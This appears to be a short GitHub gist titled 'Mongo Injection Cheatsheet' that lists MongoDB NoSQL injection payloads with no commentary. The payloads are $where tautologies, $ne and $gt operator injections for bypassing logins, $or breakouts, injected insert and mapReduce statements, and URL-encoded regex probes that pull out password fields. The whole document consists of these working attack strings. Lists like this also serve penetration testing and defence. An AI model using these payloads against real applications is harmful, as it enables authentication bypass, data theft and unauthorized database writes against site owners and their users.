@trickycdm
Last active July 4, 2017 20:30
Mongo Injection Cheatsheet

true, $where: '1 == 1'

, $where: '1 == 1'

$where: '1 == 1'

', $where: '1 == 1'

1, $where: '1 == 1'

{ $ne: 1 }

', $or: [ {}, { 'a':'a

' } ], $comment:'successful MongoDB injection'

db.injection.insert({success:1});

db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1

|| 1==1

' && this.password.match(/.*/)//+%00

' && this.passwordzz.match(/.*/)//+%00

'%20%26%26%20this.password.match(/.*/)//+%00

'%20%26%26%20this.passwordzz.match(/.*/)//+%00

{$gt: ''}

{"$gt": ""}

[$ne]=1
